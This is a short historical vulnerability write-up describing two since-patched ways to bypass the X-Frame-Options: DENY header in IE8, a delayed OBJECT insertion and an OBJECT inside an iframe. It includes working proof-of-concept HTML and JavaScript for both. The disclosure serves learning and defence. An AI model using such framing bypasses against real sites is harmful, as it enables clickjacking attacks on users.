Two approaches bypassed the X-Frame-Options: DENY header in IE8. The first uses a XAML Frame element as the embedding container; the second delays the insertion of an HTML OBJECT element via setTimeout, which caused IE to skip the header check on insertion.

<!-- Bypass via delayed OBJECT insertion -->
<script language="JavaScript">
var oHtml = document.createElement('<OBJECT TYPE="text/html" DATA="xframe.aspx" WIDTH="200" HEIGHT="100"></OBJECT>');
setTimeout("document.body.appendChild(oHtml);",1000);
</script>

Variation: OBJECT Inside IFRAME

This variation was found by David Ross, who took the same technique in a slightly different direction.

<!-- object.html, loaded inside a regular iframe -->
<object id="newObj" data="xframe.aspx" type="text/html" width="400" height="120"></object>
<!-- index.html -->
<iframe src="object.html" width="440" height="200"></iframe>

In this variation there are no tricks at all — just a plain <object> tag nested inside an <iframe>. No createElement, no setTimeout. Both bypasses let an attacker load a page that had declared it should not be framed. Tested on IE8/Win7 and IE8/XP.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.